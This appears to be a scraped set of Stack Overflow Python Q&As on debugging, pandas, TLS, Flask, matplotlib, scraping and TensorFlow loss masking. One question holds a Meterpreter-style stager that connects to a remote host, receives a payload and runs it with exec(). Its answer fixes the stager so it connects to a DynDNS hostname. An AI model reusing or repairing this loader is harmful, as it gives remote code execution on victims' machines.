<p>From the <a href="https://docs.python.org/2/library/pdb.html" rel="nofollow">Python 2.7 Documentation</a>:</p> <blockquote> <p>It supports setting (conditional) breakpoints and single stepping at the source line level, inspection of stack frames, source code listing, and evaluation of arbitrary Python code in the context of any stack frame.</p> </blockquote> <p>As mentioned above, pdb gives you ways of inspecting stack frames (watching, listing, and evaluating code within a frame).</p> <p>Diving into frame objects would definitely help you in understanding the pdb module. See <a href="https://docs.python.org/2/library/inspect.html" rel="nofollow">inspect — Inspect live objects</a> and <a href="https://docs.python.org/2/library/inspect.html#the-interpreter-stack" rel="nofollow">The interpreter stack</a>.</p>
1
2016-07-21T10:13:00Z
[ "python", "debugging" ]
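Concretely, pdb is built on the interpreter's tracing hook: sys.settrace registers a callback that the interpreter invokes on every call, line, return and exception event in newly entered frames, which is what makes breakpoints and single stepping possible without any compilation step. A minimal tracer:

```python
import sys

events = []

def tracer(frame, event, arg):
    # called by the interpreter for each event in frames entered after settrace
    events.append((event, frame.f_code.co_name))
    return tracer  # returning the tracer keeps line-level tracing active

def demo(x):
    y = x + 1
    return y

sys.settrace(tracer)
demo(1)
sys.settrace(None)

print(events)
```

A debugger like pdb does the same thing, but instead of appending to a list it compares the current line against its breakpoint table and drops into an interactive prompt on a hit.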
Getting “pika.exceptions.ConnectionClosed” error while using rabbitmq in python
38,501,394
<p>I am trying to use rabbitmq in python. My code is:</p> <pre><code>import pika if __name__ == '__main__': connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost')) </code></pre> <p>I am running this file using:</p> <pre><code>python3 test.py </code></pre> <p>Error Signature:</p> <pre><code>Traceback (most recent call last): File "Test.py", line 4, in &lt;module&gt; connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost')) File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/pika/adapters/blocking_connection.py", line 339, in __init__ self._process_io_for_connection_setup() File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/pika/adapters/blocking_connection.py", line 374, in _process_io_for_connection_setup self._open_error_result.is_ready) File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/pika/adapters/blocking_connection.py", line 395, in _flush_output raise exceptions.ConnectionClosed() pika.exceptions.ConnectionClosed </code></pre> <p>I already referred to <a href="http://stackoverflow.com/questions/22061082/getting-pika-exceptions-connectionclosed-error-while-using-rabbitmq-in-python">this</a>, but I don't have any sleep in my code. Not really sure what could go wrong. Please let me know if I am missing something obvious.</p>
0
2016-07-21T10:13:56Z
38,503,831
<p>The issue was with rabbitmqctl. I reconfigured it, restarted the service, and the issue is fixed.</p> <ol> <li>Make sure rabbitmqctl is installed (if installed, uninstall it and re-install; when you just enter rabbitmqctl, it should display the help) </li> <li>rabbitmqctl start_app </li> </ol> <p>TIP: I tried installing first using 'brew', but for some reason I wasn't able to get it right. So I installed rabbitmqctl as a separate package and added it to PATH</p>
0
2016-07-21T12:05:36Z
[ "python", "rabbitmq" ]
ioerror errno 13 permission denied: 'C:\\pagefile.sys'
38,501,476
<p>Below is my code. What I am trying to achieve is walking through the OS, generating an MD5 hash of every file. The code is functional; however, I receive the error in the title "ioerror errno 13 permission denied: 'C:\pagefile.sys'" when I try to run the file from C:\. Is there a way I can run this as an admin? Even when I run cmd as an admin that does not work. Thank you in advance.</p> <pre><code>import os, hashlib current_dir = os.getcwd() for root,dirs,files in os.walk(current_dir): for f in files: current_file = os.path.join(root,f) H = hashlib.md5() with open(current_file) as FIN: H.update(FIN.read()) with open("gethashes.txt", "a") as myfile: myfile.write(current_file),myfile.write(", "),myfile.write(H.hexdigest()),myfile.write("\n") print current_file, H.hexdigest() </code></pre>
-1
2016-07-21T10:17:52Z
38,504,398
<p>As the error says, permission is denied: the file needs to be read to compute the MD5 of its content, and there will always be files we don't have read permission for, so catch the exception and move on. Opening in binary mode ('rb') also makes sure the hash is computed over the raw bytes.</p> <pre><code>import os, hashlib def md5_chk(current_file): try: md5 = '' err = '' H = hashlib.md5() with open(current_file, 'rb') as FIN: H.update(FIN.read()) md5 = H.hexdigest() except Exception, e: md5 = None err = str(e) print err return md5,err if __name__ == '__main__': current_dir = os.getcwd() for root,dirs,files in os.walk(current_dir): with open("G:/gethashes.txt", "a") as myfile: for f in files: current_file = os.path.join(root,f) md5_val,err = md5_chk(current_file) if md5_val is not None: myfile.write(current_file),myfile.write(", "),myfile.write(md5_val),myfile.write("\n") print current_file, md5_val else: myfile.write(current_file),myfile.write(", "),myfile.write("Error - " + str(err)),myfile.write("\n") print current_file, str(err) </code></pre> <p>Please let me know if it is useful.</p>
0
2016-07-21T12:31:21Z
[ "python", "os.walk" ]
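A Python 3 sketch of the same idea that avoids the two usual pitfalls: it opens files in binary mode (required for correct hashes on Windows) and skips anything it cannot read instead of crashing:

```python
import hashlib
import os
import tempfile

def md5_of(path, chunk_size=8192):
    """Return the MD5 hex digest of a file, or None if it cannot be read."""
    h = hashlib.md5()
    try:
        with open(path, "rb") as f:  # binary mode so the raw bytes are hashed
            for block in iter(lambda: f.read(chunk_size), b""):
                h.update(block)
    except OSError:                  # e.g. PermissionError on C:\pagefile.sys
        return None
    return h.hexdigest()

# quick demonstration on a throwaway file
tmp = tempfile.NamedTemporaryFile(delete=False)
tmp.write(b"hello")
tmp.close()
digest = md5_of(tmp.name)
missing = md5_of(tmp.name + ".does-not-exist")
os.unlink(tmp.name)
print(digest, missing)
```

Reading in chunks also keeps memory flat on huge files, which `FIN.read()` in the answer above does not.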
Forcing requests library to use TLSv1.1 or TLSv1.2 in Python
38,501,531
<p>I am trying to send a POST call using the requests library in Python to a server. Earlier I was able to successfully send POST calls, but recently the server deprecated TLSv1.0 and now only supports TLSv1.1 and TLSv1.2. Now the same code throws me a "requests.exceptions.SSLError: EOF occurred in violation of protocol (_ssl.c:590)" error.</p> <p>I found this thread on stackoverflow <a href="http://stackoverflow.com/questions/14102416/python-requests-requests-exceptions-sslerror-errno-8-ssl-c504-eof-occurred">Python Requests requests.exceptions.SSLError: [Errno 8] _ssl.c:504: EOF occurred in violation of protocol</a> which says that we need to subclass the HTTPAdapter, after which the session object will use TLSv1. I changed my code accordingly and here is my new code:</p> <pre><code>class MyAdapter(HTTPAdapter): def init_poolmanager(self, connections, maxsize, block=False): self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize, block=block, ssl_version=ssl.PROTOCOL_TLSv1) url="https://mywebsite.com/ui/" headers={"Cookie":"some_value","X-CSRF-Token":"some value","Content-Type":"application/json"} payload={"name":"some value","Id":"some value"} s = requests.Session() s.mount('https://', MyAdapter()) r=s.post(url,json=payload,headers=headers) html=r.text print html </code></pre> <p>But even after using this, I get the same error "EOF occurred in violation of protocol (_ssl.c:590)".</p> <p>My first question: I read somewhere that requests uses SSL by default. I know that my server used TLSv1.0 then, so was my code working because TLSv1.0 has backward compatibility with SSL 3.0?</p> <p>My second question: the stackoverflow thread mentioned above, which I used to change my code to subclass HTTPAdapter, says that this will work for TLSv1. But since TLSv1.0 is deprecated on my server, will this code still work?</p>
0
2016-07-21T10:19:41Z
38,502,727
<p>The TLS stack will use the best version available automatically. If it does not work any longer when TLS 1.0 support is disabled at the server it usually means that your local TLS stack simply does not support newer protocol version like TLS 1.2. This is often the case on Mac OS X since it ships with a rotten old version of OpenSSL (0.9.8). In this case no python code will help you to work around the problem, but you need to get a python which uses a newer version of OpenSSL.</p> <p>To check which openssl version you are using execute the following within python:</p> <pre><code>import ssl print ssl.OPENSSL_VERSION </code></pre> <p>To have support for TLS 1.2 you need OpenSSL version 1.0.2 or 1.0.1. If you have only 1.0.0 or 0.9.8 you need to upgrade your python+OpenSSL. See <a href="http://stackoverflow.com/questions/18752409/updating-openssl-in-python-2-7">Updating openssl in python 2.7</a> for more information on how to do this.</p>
0
2016-07-21T11:12:30Z
[ "python", "ssl" ]
how can i struct.unpack use domain name in place of ip in socket.connect remotely
38,501,536
<p>I have the following code. When I use the external IP directly it works just fine, but when I change the IP to a domain provided by DynDNS it fails and throws the error listed below.</p> <pre><code>import socket,struct # Connect with hostname # dgts = socket.gethostbyname('chxxxmaz.dyndns.biz') # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect(("'" + dgts + "'", 1604)) # Connect with IP s = socket.socket(2, 1) s.connect(('197.xxx.xxx.45', 1604)) # Receive data l = struct.unpack('&gt;I', s.recv(4))[0] d = s.recv(4096) while len(d) != l: d += s.recv(4096) exec(d, {'s': s}) </code></pre> <p>The error message:</p> <pre><code>Traceback (most recent call last): File "/home/elite/Desktop/launch_meterpreter_working.py", line 8, in &lt;module&gt; l=struct.unpack('&gt;I',s.recv(4))[0] error: unpack requires a string argument of length 4 </code></pre>
0
2016-07-21T10:19:49Z
38,501,958
<p>There is no need to manually resolve the hostname, you can simply use it when connecting the socket.</p> <p>Your problem comes from the quotes that you add when you connect (why <code>"'" + dgts + "'"</code>?)</p> <pre><code>import socket, struct # Connect s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('chxxxmaz.dyndns.biz', 1604)) # Receive data l = struct.unpack('&gt;I', s.recv(4))[0] d = s.recv(4096) while len(d) != l: d += s.recv(4096) exec(d, {'s': s}) </code></pre>
0
2016-07-21T10:37:18Z
[ "python", "sockets", "static", "dns", "ip" ]
create new pandas dataframe column based on if-else condition with a lookup
38,501,685
<p>I have a pandas dataframe and I need to create a new column based on an if-else condition. This question already came up here multiple times (e.g., <a href="http://stackoverflow.com/questions/21702342/creating-a-new-column-based-on-if-elif-else-condition">Creating a new column based on if-elif-else condition</a>).</p> <p>However, I cannot apply the proposed solution, since I also need to look up values in a list in order to check the condition. I cannot do this with the proposed solution, because I am not sure how I can access my lookup-list in the external function. My lookup-list would need to be global, which I want to avoid. I have the feeling there should be a better way to do this.</p> <p>Consider the following dataframe <code>df</code>:</p> <pre><code>letters A B C D E F </code></pre> <p>I also have a list which contains lookup values:</p> <pre><code>lookup = ['C', 'D'] </code></pre> <p>Now, I want to create a new column in my dataframe which contains <code>1</code> if the respective value is contained in <code>lookup</code> and <code>0</code> if the value is not in <code>lookup</code>.</p> <p>The typical approach would be:</p> <pre><code>def helper(row): if(row['letters'].isin(lookup)): row['result'] = 1 else: row['result'] = 0 df.apply(helper, axis=1) </code></pre> <p>However, I do not know how I can access <code>lookup</code> in <code>helper()</code> without making it global.</p> <p>The result should look like this:</p> <pre><code>letters result A 0 B 0 C 1 D 1 E 0 F 0 </code></pre>
1
2016-07-21T10:25:27Z
38,502,414
<p>Although this question is very similar to the question: <a href="http://stackoverflow.com/questions/38499890/how-to-use-pandas-apply-function-on-all-columns-of-some-rows-of-data-frame">How to use pandas apply function on all columns of some rows of data frame</a></p> <p>I think here it's worth showing a couple methods, on a single line using <code>np.where</code> with a boolean mask generated from <code>isin</code>, <code>isin</code> will return a boolean Series where any rows contain any matches in your list:</p> <pre><code>In [71]: lookup = ['C','D'] df['result'] = np.where(df['letters'].isin(lookup), 1, 0) df Out[71]: letters result 0 A 0 1 B 0 2 C 1 3 D 1 4 E 0 5 F 0 </code></pre> <p>here using 2 <code>loc</code> statements and using <code>~</code> to invert the mask:</p> <pre><code>In [72]: df.loc[df['letters'].isin(lookup),'result'] = 1 df.loc[~df['letters'].isin(lookup),'result'] = 0 df Out[72]: letters result 0 A 0 1 B 0 2 C 1 3 D 1 4 E 0 5 F 0 </code></pre>
1
2016-07-21T10:58:01Z
[ "python", "pandas", "conditional", "condition" ]
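The boolean mask can also be cast straight to integers, which collapses the whole thing to one line with no helper function and no global lookup (same sample data as the question):

```python
import pandas as pd

df = pd.DataFrame({"letters": list("ABCDEF")})
lookup = ["C", "D"]

# isin yields a boolean Series; casting to int gives the 0/1 result column
df["result"] = df["letters"].isin(lookup).astype(int)
print(df)
```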
connecting mysql to flask - No module named 'flaskext'
38,501,772
<p>I want to connect MySQL to Flask.</p> <p>Before adding this configuration part:</p> <pre><code>app = Flask(__name__) mysql = MySQL() app.config['MYSQL_DATABASE_USER'] = 'username' app.config['MYSQL_DATABASE_PASSWORD'] = 'password' app.config['MYSQL_DATABASE_DB'] = 'dbname' app.config['MYSQL_DATABASE_HOST'] = 'localhost' mysql.init_app(app) </code></pre> <p>I tried to import <code>from flaskext.mysql import MySQL</code>, but after that I faced this error:</p> <blockquote> <p>from flaskext.mysql import MySQL</p> <p>ImportError: No module named 'flaskext'</p> </blockquote> <p>Then I tried <code>pip install flaskext.mysql</code> but got this error:</p> <blockquote> <p>Could not find a version that satisfies the requirement flaskext.mysql (from versions: ) No matching distribution found for flaskext.mysql</p> </blockquote> <p>So what should I do then?</p>
0
2016-07-21T10:29:20Z
38,506,557
<p>The '.' is missing, try <code>from flask.ext.mysql import MySQL</code>. But if you are using Flask 0.11, extension imports of the form <code>flask.ext.foo</code> have been <a href="http://flask.pocoo.org/docs/0.11/upgrading/#extension-imports" rel="nofollow">deprecated</a> you should use <code>from flask_foo</code>. Also see <a href="http://flask.pocoo.org/docs/0.11/extensiondev/#extension-import-transition" rel="nofollow">this</a>.</p>
0
2016-07-21T14:09:40Z
[ "python", "mysql", "flask" ]
Matplotlib: combine legend with same color and name
38,501,822
<p>If I repeat the plot with the same color and label name, the label would appear multiple times:</p> <pre><code>from mpl_toolkits.mplot3d import Axes3D fig = plt.figure() ax = fig.gca(projection='3d') x_labels = [10,20,30] x = [1,2,3,4] y = [3,1,5,1] for label in x_labels: x_3d = label*np.ones_like(x) ax.plot(x_3d, x, y, color='black', label='GMM') ax.legend() </code></pre> <p><a href="http://i.stack.imgur.com/J7eAB.png" rel="nofollow"><img src="http://i.stack.imgur.com/J7eAB.png" alt="enter image description here"></a></p> <p>Is it possible to make them into one, combining the legends with the same labels into one? Something like</p> <p><a href="http://i.stack.imgur.com/RoexB.png" rel="nofollow"><img src="http://i.stack.imgur.com/RoexB.png" alt="enter image description here"></a></p> <p>I can produce the above pic by </p> <pre><code>from mpl_toolkits.mplot3d import Axes3D fig = plt.figure() ax = fig.gca(projection='3d') x_labels = [10,20,30] x = [1,2,3,4] y = [3,1,5,1] legend = False for label in x_labels: x_3d = label*np.ones_like(x) ax.plot(x_3d, x, y, color='black', label='GMM') if legend == False: ax.legend() legend = True </code></pre> <p>But this feels very ugly; is there any good solution? Or am I simply making the plot in a wrong way?</p>
3
2016-07-21T10:31:34Z
38,502,062
<p>You should only show the label for one of the three sets of data. This can be done by adding an if/else statement in the <code>label = ...</code> in <code>ax.plot()</code>. Below is an example:</p> <pre><code>from mpl_toolkits.mplot3d import Axes3D fig = plt.figure() ax = fig.gca(projection='3d') x_labels = [10,20,30] x = [1,2,3,4] y = [3,1,5,1] for label in x_labels: x_3d = label*np.ones_like(x) ax.plot(x_3d, x, y, color='black', label='GMM' if label == x_labels[0] else '') # above only shows the label for the first plot ax.legend() plt.show() </code></pre> <p>This gives the following graph:</p> <p><a href="http://i.stack.imgur.com/AVl1w.png" rel="nofollow"><img src="http://i.stack.imgur.com/AVl1w.png" alt="enter image description here"></a></p> <p><strong>EDIT:</strong></p> <p>If you have different colors then you could use the following to show the legend only once for each color:</p> <pre><code>fig = plt.figure() ax = fig.gca(projection='3d') x_labels = [10,20,30,40,50] x = [1,2,3,4] y = [3,1,5,1] colors = ['black','red','black','orange','orange'] labels = ['GMM','Other 1','GMM','Other 2','Other 2'] some_list= [] for i in range(len(x_labels)): x_3d = x_labels[i]*np.ones_like(x) ax.plot(x_3d, x, y, color=colors[i], label=labels[i] if colors[i] not in some_list else '') if colors.count(colors[i])&gt;1: some_list.append(colors[i]) ax.legend() plt.show() </code></pre> <p>This gives the following graph:</p> <p><a href="http://i.stack.imgur.com/WvisI.png" rel="nofollow"><img src="http://i.stack.imgur.com/WvisI.png" alt="enter image description here"></a></p>
2
2016-07-21T10:42:25Z
[ "python", "matplotlib" ]
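A third pattern for the legend question above, which avoids both the if/else label trick and the flag variable, is to filter the handle/label pairs after plotting and pass the filtered lists to `ax.legend(handles, labels)`. The helper below is a sketch of just the filtering step; it assumes matplotlib's `ax.get_legend_handles_labels()` supplies the two parallel lists.

```python
def dedupe_legend(handles, labels):
    """Keep one handle per distinct label text, preserving first-seen order."""
    seen = {}
    for handle, label in zip(handles, labels):
        seen.setdefault(label, handle)  # first handle wins for each label
    return list(seen.values()), list(seen.keys())

# Intended usage (assumption: ax is a matplotlib Axes with labelled artists):
#   handles, labels = ax.get_legend_handles_labels()
#   ax.legend(*dedupe_legend(handles, labels))
```

This keeps the plotting loop free of legend bookkeeping entirely.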
How to ping RethinkDB in Python, to check whether the db server is down?
38,501,961
<pre><code>import rethinkdb as r con=r.connect(host='localhost') </code></pre> <p>How do I ping? How do I use the existing connection to ping the DB server?</p>
-3
2016-07-21T10:37:24Z
38,513,196
<p>If you want to check that the connection is still healthy and running queries, you could do something like <code>r.expr(0).run(conn) == 0</code>.</p>
0
2016-07-21T19:51:03Z
[ "python", "rethinkdb" ]
pandas DataFrame reset_index for columns?
38,502,084
<p>Is there any equivalent of pandas.DataFrame.reset_index which operates on the columns and is able to handle the case of duplicate column names?</p> <p>Obviously I could simply assign new values to columns; what I want to know is whether there is a method like df.reset_index to do that.</p> <p>Sample Input </p> <pre><code> pd.DataFrame(np.random.rand(5, 3), columns = ['A', 'A', 'B']) A A B 0 0.5 0.3 0.9 1 0.7 0.9 0.3 2 0.9 0.4 0.8 3 0.6 0.2 0.9 4 0.7 0.4 0.6 </code></pre> <p>Expected output</p> <pre><code> 0 1 2 0 0.8 0.1 0.2 1 0.4 0.2 0.4 2 0.3 0.3 0.4 3 0.4 0.1 0.8 4 1.0 0.9 0.9 </code></pre> <p>where 0, 1, 2 is just the default way of pandas to name columns if no name is provided.</p> <p>The existing methods like <code>df.rename</code> or <code>df.reindex_axis</code> do not work when I have duplicate column names.</p>
4
2016-07-21T10:43:27Z
38,502,106
<p>Use <code>range</code> with the number of columns, taken from <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.shape.html" rel="nofollow"><code>shape</code></a>:</p> <pre><code>df.columns = range(df.shape[1]) print (df) 0 1 2 0 0.228080 0.884450 0.753401 1 0.176790 0.741979 0.525305 2 0.680255 0.730258 0.449681 3 0.169420 0.660825 0.986554 4 0.302204 0.040413 0.902899 </code></pre> <p>Another solution is double transposing with <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.T.html" rel="nofollow"><code>T</code></a> and <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.reset_index.html" rel="nofollow"><code>reset_index</code></a> with parameter <code>drop=True</code>:</p> <pre><code>df = df.T.reset_index(drop=True).T print (df) 0 1 2 0 0.024846 0.688193 0.887926 1 0.284681 0.895319 0.142876 2 0.440834 0.299527 0.762815 3 0.936967 0.928907 0.642960 4 0.801077 0.085773 0.866651 </code></pre>
2
2016-07-21T10:44:22Z
[ "python", "pandas", "dataframe", "duplicates", "reindex" ]
pandas DataFrame reset_index for columns?
38,502,084
<p>Is there any equivalent of pandas.DataFrame.reset_index which operates on the columns and is able to handle the case of duplicate column names?</p> <p>Obviously I could simply assign new values to columns; what I want to know is whether there is a method like df.reset_index to do that.</p> <p>Sample Input </p> <pre><code> pd.DataFrame(np.random.rand(5, 3), columns = ['A', 'A', 'B']) A A B 0 0.5 0.3 0.9 1 0.7 0.9 0.3 2 0.9 0.4 0.8 3 0.6 0.2 0.9 4 0.7 0.4 0.6 </code></pre> <p>Expected output</p> <pre><code> 0 1 2 0 0.8 0.1 0.2 1 0.4 0.2 0.4 2 0.3 0.3 0.4 3 0.4 0.1 0.8 4 1.0 0.9 0.9 </code></pre> <p>where 0, 1, 2 is just the default way of pandas to name columns if no name is provided.</p> <p>The existing methods like <code>df.rename</code> or <code>df.reindex_axis</code> do not work when I have duplicate column names.</p>
4
2016-07-21T10:43:27Z
38,502,767
<p>You can use the <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.set_axis.html" rel="nofollow">set_axis()</a> method:</p> <pre><code>In [54]: df Out[54]: A A B 0 0.934900 0.817182 0.166270 1 0.064543 0.139431 0.249576 2 0.709349 0.731913 0.965048 3 0.284955 0.479898 0.496652 4 0.520749 0.464256 0.999993 In [55]: df.set_axis(1, range(len(df.columns))) In [56]: df Out[56]: 0 1 2 0 0.934900 0.817182 0.166270 1 0.064543 0.139431 0.249576 2 0.709349 0.731913 0.965048 3 0.284955 0.479898 0.496652 4 0.520749 0.464256 0.999993 </code></pre>
2
2016-07-21T11:14:31Z
[ "python", "pandas", "dataframe", "duplicates", "reindex" ]
How to modify the seq2seq cost function for padded vectors?
38,502,366
<p>Tensorflow supports dynamic-length sequences by use of the parameter 'sequence_length' while constructing the RNN layer, wherein the model does not learn the sequence beyond the sequence size = 'sequence_length', i.e., it returns a zero vector. </p> <p>However, how can the cost function at <a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/seq2seq.py#L890" rel="nofollow">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/seq2seq.py#L890</a> be modified to account for the masked sequences, so that cost and perplexity are calculated only on the actual sequences rather than the whole padded sequence? </p> <pre><code>def sequence_loss_by_example(logits, targets, weights, average_across_timesteps=True, softmax_loss_function=None, name=None): if len(targets) != len(logits) or len(weights) != len(logits): raise ValueError("Lengths of logits, weights, and targets must be the same " "%d, %d, %d." % (len(logits), len(weights), len(targets))) with ops.op_scope(logits + targets + weights, name, "sequence_loss_by_example"): log_perp_list = [] for logit, target, weight in zip(logits, targets, weights): if softmax_loss_function is None: # TODO(irving,ebrevdo): This reshape is needed because # sequence_loss_by_example is called with scalars sometimes, which # violates our general scalar strictness policy. target = array_ops.reshape(target, [-1]) crossent = nn_ops.sparse_softmax_cross_entropy_with_logits( logit, target) else: crossent = softmax_loss_function(logit, target) log_perp_list.append(crossent * weight) log_perps = math_ops.add_n(log_perp_list) if average_across_timesteps: total_size = math_ops.add_n(weights) total_size += 1e-12 # Just to avoid division by 0 for all-0 weights. log_perps /= total_size return log_perps </code></pre>
0
2016-07-21T10:55:56Z
38,502,547
<p>This function already supports calculating costs for dynamic sequence lengths through the use of weights. As long as you ensure the weights are 0 for the "padding targets", the cross entropy will be pushed to 0 for those steps:</p> <pre><code>log_perp_list.append(crossent * weight) </code></pre> <p>and the total size will also reflect only the non-padding steps:</p> <pre><code>total_size = math_ops.add_n(weights) </code></pre> <p>If you're padding with zeros, one way to derive the weights is as follows:</p> <pre><code>weights = tf.sign(tf.abs(model.targets)) </code></pre> <p>(Note that you might need to cast this to the same type as your targets)</p>
1
2016-07-21T11:04:30Z
[ "python", "dynamic", "tensorflow", "deep-learning", "lstm" ]
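The weighting scheme the answer above describes boils down to a masked mean: padded steps get weight 0, so they contribute nothing to either the numerator or the denominator. A minimal pure-Python sketch of that reduction (the 1e-12 term mirrors the epsilon in `sequence_loss_by_example`):

```python
def masked_mean_loss(step_losses, weights, eps=1e-12):
    """Average per-timestep losses, ignoring padded steps (weight 0)."""
    total = sum(loss * w for loss, w in zip(step_losses, weights))
    size = sum(weights) + eps  # avoid division by zero for all-zero weights
    return total / size
```

For example, a padded third step with weight 0 does not affect the average of the first two steps.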
For loop not working in view.py Django?
38,502,382
<p>in view.py</p> <pre><code>Id = [2,3,4,5,6,7,8] for w in Id: A = w Pending = pending(A) data = { 'Pending': Pending, } return render_to_response('dialer_campaign/campaign/list.html', data, context_instance=RequestContext(request)) def pending(campaign_id): A = Campaign_phonebook.objects.values_list('phonebook_id').filter(campaign_id = campaign_id) B = Contact.objects.filter(phonebook_id__in=A).count() C = Subscriber.objects.filter(campaign_id = campaign_id).exclude(status = 1).count() Result = B - C return Result </code></pre> <p>When I pass a manual value instead of A it gives a result, but when I pass the value from the for loop it is not working. Why? Can anybody help me?</p> <p>What changes should I do in the templates?</p> <p><a href="http://i.stack.imgur.com/8H40m.png" rel="nofollow"><img src="http://i.stack.imgur.com/8H40m.png" alt="In the image you can see the result when I assign pending(8). I want to get the result from the loop, so that every box in pending shows the value for its loop value."></a></p> <p>Thanks in advance.</p>
-3
2016-07-21T10:56:41Z
38,502,820
<p>Collect your data objects in a list and render that list to the template.</p> <p>Refer to the following code (note that the loop variable must not be named <code>pending</code>, otherwise it shadows the <code>pending</code> function after the first iteration):</p> <pre><code>Id = [2,3,4,5,6,7,8] pending_list = [] for w in Id: pending_value = pending(w) pending_list.append({'pending': pending_value}) return render_to_response('dialer_campaign/campaign/list.html', {'pending_list': pending_list}, context_instance=RequestContext(request)) def pending(campaign_id): A = Campaign_phonebook.objects.values_list('phonebook_id').filter(campaign_id = campaign_id) B = Contact.objects.filter(phonebook_id__in=A).count() C = Subscriber.objects.filter(campaign_id = campaign_id).exclude(status = 1).count() Result = B - C return Result </code></pre> <p>Use <code>pending_list</code> in your template; it contains all the pending objects.</p>
1
2016-07-21T11:17:08Z
[ "python", "django", "django-views" ]
How can I parse long web pages with beautiful soup?
38,502,390
<p>I have been using following code to parse web page in the link <a href="https://www.blogforacure.com/members.php" rel="nofollow">https://www.blogforacure.com/members.php</a>. The code is expected to return the links of all the members of the given page.</p> <pre><code> from bs4 import BeautifulSoup import urllib r = urllib.urlopen('https://www.blogforacure.com/members.php').read() soup = BeautifulSoup(r,'lxml') headers = soup.find_all('h3') print(len(headers)) for header in headers: a = header.find('a') print(a.attrs['href']) </code></pre> <p>But I get only the first 10 links from the above page. Even while printing the prettify option I see only the first 10 links .Can anyone help me to resolve the issue?</p>
1
2016-07-21T10:57:00Z
38,512,338
<p>The results are dynamically loaded by making AJAX requests to the <code>https://www.blogforacure.com/site/ajax/scrollergetentries.php</code> endpoint.</p> <p>Simulate them in your code with <a href="http://docs.python-requests.org/en/master/" rel="nofollow"><code>requests</code></a> <a class='doc-link' href="http://stackoverflow.com/documentation/python/1792/web-scraping-with-python/8152/maintaining-web-scraping-session-with-requests#t=201607230109412032273">maintaining a web-scraping session</a>:</p> <pre><code>from bs4 import BeautifulSoup import requests url = "https://www.blogforacure.com/site/ajax/scrollergetentries.php" with requests.Session() as session: session.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'} session.get("https://www.blogforacure.com/members.php") page = 0 members = [] while True: # get page response = session.post(url, data={ "p": str(page), "id": "#scrollbox1" }) html = response.json()['html'] # parse html soup = BeautifulSoup(html, "html.parser") page_members = [member.get_text() for member in soup.select(".memberentry h3 a")] print(page, page_members) members.extend(page_members) page += 1 </code></pre> <p>It prints the current page number and the list of members per page accumulating member names into a <code>members</code> list. Not posting what it prints since it contains names.</p> <p>Note that I've intentionally left the loop endless, please figure out the exit condition. May be when <code>response.json()</code> throws an error.</p>
1
2016-07-21T18:58:33Z
[ "python", "html", "web-scraping", "beautifulsoup" ]
Pandas DatetimeIndex NonExistentTimeError only when creating MultiIndex
38,502,474
<p>I have a <code>list</code> of data that has been read from MongoDB. A subset of the data can be found in <a href="https://gist.githubusercontent.com/philipobrien/280aa38cf024949d33c88fa903ffcb00/raw/1baad587704dfad32b539343b1ab2bffe9ccd9ab/Pandas%2520DatetimeIndex%2520Sample%2520Data" rel="nofollow">this gist</a>. I am creating a DataFrame from this list, using the Date fields to create a <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DatetimeIndex.html" rel="nofollow">DatetimeIndex</a>. The dates were recorded originally in my local timezone, but in Mongo they have no timezone information attached, so I correct for DST as advised <a href="http://stackoverflow.com/questions/38201666/pandas-datetimeindex-from-mongodb-isodate">here</a>.</p> <pre><code>from datetime import datetime from dateutil import tz # data is the list from the gist dates = [x['Date'] for x in data] idx = pd.DatetimeIndex(dates, freq='D') idx = idx.tz_localize(tz=tz.tzutc()) idx = idx.tz_convert(tz='Europe/Dublin') idx = idx.normalize() frame = DataFrame(data, index=idx) frame = frame.drop('Date', 1) </code></pre> <p>everything seems to work fine, and my frame looks like this</p> <pre><code> Events ID 2008-03-31 00:00:00+01:00 0.0 116927302 2008-03-30 00:00:00+00:00 2401.0 116927302 2008-03-31 00:00:00+01:00 0.0 116927307 2008-03-30 00:00:00+00:00 0.0 116927307 2008-03-31 00:00:00+01:00 0.0 121126919 2008-03-30 00:00:00+00:00 1019.0 121126919 2008-03-30 00:00:00+00:00 0.0 121126922 2008-03-31 00:00:00+01:00 0.0 121126922 2008-03-30 00:00:00+00:00 0.0 121127133 2008-03-31 00:00:00+01:00 0.0 121127133 2008-03-31 00:00:00+01:00 0.0 131677370 2008-03-30 00:00:00+00:00 0.0 131677370 2008-03-30 00:00:00+00:00 0.0 131677416 2008-03-31 00:00:00+01:00 0.0 131677416 </code></pre> <p>Now I want to use both the original DatetimeIndex and the ID column to create a <a href="http://pandas.pydata.org/pandas-docs/stable/advanced.html" rel="nofollow">MultiIndex</a> as shown <a 
href="http://stackoverflow.com/a/38486494/1521933">here</a>. When I try this, however, I get an error that wasn't raised when originally creating the DatetimeIndex</p> <pre><code>frame.set_index([frame.ID, idx]) </code></pre> <blockquote> <p>NonExistentTimeError: 2008-03-30 01:00:00</p> </blockquote> <p>If I just do <code>frame.set_index(idx)</code> without the MultiIndex, it raises no error</p> <p><strong>Versions</strong></p> <ul> <li>Python 2.7.11</li> <li>Pandas 0.18.0</li> </ul>
2
2016-07-21T11:00:52Z
38,502,878
